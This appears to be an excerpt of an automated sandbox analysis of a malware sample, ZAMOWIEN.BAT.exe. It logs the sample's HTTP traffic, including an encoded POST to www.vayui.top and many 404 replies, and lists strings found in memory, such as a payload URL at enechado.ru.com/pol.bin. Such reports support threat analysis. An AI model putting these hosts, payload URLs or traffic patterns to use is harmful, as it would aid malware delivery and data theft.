          Source: unknown HTTP traffic detected: POST /4twy/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Host: www.vayui.top Origin: http://www.vayui.top Referer: http://www.vayui.top/4twy/ Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0 Data Ascii: 2WLcH=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5SWd7vWWIOMxdsEPgaHRV72KeT871dqMC2Q==
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 10:57:26 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 10:57:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nn%2FY3DFf23%2Fnv1pl6kKEYYRLmOSlP4zMhfz%2BIeD9s4j5GkPjBr%2BKxJuNfO9sT%2F0ZTQdRD84sox9j22%2Blyghgq9uOesy5pAxWfKPh%2B5fcGeAAPsiR3y1tFgxjBQrz68l"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e811e8e0c0e43da-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=97323&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 10:57:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rW0Y8xbgpcUmH5YdZfgzYjN9Hl3tRSoydkmHgvKo%2FjhuxFVdUZznlZ3Kq0t273M40EM7JfTgz7JijBqwsYvg8kUSaVok3z7zE0T0Nd0LUnbEe%2BBPTduAZQDaadmt3kpr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e811e9e7bdf7cfc-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=97601&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 10:57:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEsP6jJOsaZ4UcO2QBFwlE78G0mqDg5EToieOys4eVQZKhtYIq2MocKj2XfAk5IbfpOlJ5l4oS7djY%2BwpMx1plkyNmCc2L2pl6pXV1hlZdgm1BcpFFFk5YRX53OaJdUu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e811eaedec8729b-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=97841&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7878&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 10:57:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lcKpuNuvD79J%2FgwQVB9l7KrOarVNBtdPXlsLOf0DbGn8RdODJk8wi2LAQmbjGcma9RmB5cCBFOvIGhDVC1w4w5EhrwZSWJu9ffHCnupNG8tPjls0IsjK2keSTUzDLEC7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e811ebf3f8641de-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=97340&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=451&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 10:58:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 10:58:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 10:58:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 10:58:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Mon, 25 Nov 2024 10:59:16 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Mon, 25 Nov 2024 10:59:19 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Mon, 25 Nov 2024 10:59:21 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Tengine | Date: Mon, 25 Nov 2024 10:59:24 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 10:59:30 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 10:59:33 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 10:59:35 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 10:59:38 GMT | Server: Apache | Content-Length: 493 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 10:59:57 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Mon, 25 Nov 2024 10:59:57 GMT | Vary: Accept-Encoding | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2BlcERhqQk9RlhzyjWzAAE9rhWX%2BitvaK25Gpcx6a%2FsEuMyVoWV6orzoTdXy9UuaNIXI92JyfFuwXTYuTVqxBFy%2BtZWPoz6ASZZuApMQKrZnxIrJwYcOmy1DLRM5b79Q2xTRIi6RG1I%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e8121dd69ce8c45-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=97378&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=733&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:00:00 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Mon, 25 Nov 2024 11:00:00 GMT | Vary: Accept-Encoding | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KVDK1uosrdd8sEhT3BAWcOWWP6BY4T4cTJV0RN0H9JxLZTjUi5Q1UIRLgCvQdm535EvH574yOqATZTq4XFy2BlKj9U1POJWI1qE42%2BaLseNt%2BFYytYeaWL44TnAHBF1LGSXflghsz6Q%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e8121eddaa07cb2-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=97727&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=753&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:00:03 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Mon, 25 Nov 2024 11:00:03 GMT | Vary: Accept-Encoding | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M08C4w6iHMkejvMUlOJHWgUjvlguRNdZ37PYUySoP5H%2B%2BrBkuXbwp6bh7WiL546gVhtXUUciL%2B9GBZrw3T%2FHZD%2BEA66YHq%2FMgdPPhvVbFU%2FptvI12rDszOBym05syhDfwV1kfi0youk%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e8121fe3c380f73-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=97079&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7902&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:00:05 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Cache-Control: no-cache, no-store, must-revalidate | Expires: Mon, 25 Nov 2024 11:00:05 GMT | Vary: Accept-Encoding | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fq6BqqEdoWpQ9ntbbyo3mXRnTIHHj600qh9DMlw8R1mUoIKNdBa6xg2idEcpxY1qEeXPltAXDsD9TYCT3%2BtYl%2BTmPHK5DIpZrLWGpqPeMeC71y3ChD9ii8gnVEs4IM0y%2B0ohaeMT4h0%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e81220e9c19c454-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=97126&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=459&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:00:11 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34 | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:00:14 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34 | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:00:16 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34 | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:00:19 GMT | Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34 | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:00:57 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:01:03 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qp%2FrSJCndQU5i6jaNo8R7BcjAEG7dYVXxX1OShSnjeGcAhuk0zEEhaIYcpapxUEIK7kSm%2BpiEyMs5UqiNxRjclIFrAT%2FOYmT2A1twJjJEB5JYBHoPNBOXg%2BzMJBWeFnk"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e812373da88de92-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=97292&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:01:05 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6UgWDk98jllv1zS3o2TUEZoLkkiCtOCf85ghPYsVB11h%2BrUbdprfRfwyW7ogqJA0xRAb7rSqBD%2F7pjkkNyWOuitnJXSPILoiSrm1%2BY5nalIQkDXt702NCM5XIA8P%2Bqt"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e8123844c1742d4-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=97389&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:01:08 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2B6hUJV6d1K21VcZq0%2F%2F%2B3vwjTJkXWpmTCf3SZGwxBepnECy9DVgtCWiRf6zN8AjepP8R21nK6WKz0jQX1lU4xIg0%2F2q5RG2laKaje9lXbSdZFa6DXDTMj%2FVTD89V4o%2F"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e812394a8e443b0-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=97738&sent=4&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7878&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 25 Nov 2024 11:01:10 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUxpLconqKnckTGgqxyCYbND%2FteMLsBeqyCP7sBG%2BII5T8KHTvQFIe9A2kc2p823eVw7fMGKTiSFEtOrdt4h1KlnoLj7S%2B2dKzywapoH6Uukmsd8XVcOyZkhgCjkq5yY"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8e8123a51dbc424f-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=97287&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=451&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 11:01:29 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 11:01:32 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 11:01:34 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 25 Nov 2024 11:01:37 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 11:02:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 11:02:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 11:02:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 25 Nov 2024 11:02:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: ZAMOWIEN.BAT.exe, 00000002.00000003.33485246567.000000000768B000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33540907483.000000000768D000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000003.33484954124.000000000768B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://enechado.ru.com/
          Source: ZAMOWIEN.BAT.exe, 00000002.00000002.33592322896.0000000007667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://enechado.ru.com/cF
          Source: ZAMOWIEN.BAT.exe, 00000002.00000002.33592719351.00000000078F0000.00000004.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000002.33592322896.0000000007667000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://enechado.ru.com/pol.bin
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: ZAMOWIEN.BAT.exe, 00000000.00000000.32164172113.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ZAMOWIEN.BAT.exe, 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ZAMOWIEN.BAT.exe, 00000002.00000000.33317382851.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000626000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.00000000005F2000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.00000000005F2000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: ZAMOWIEN.BAT.exe, 00000002.00000001.33319853756.0000000000649000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
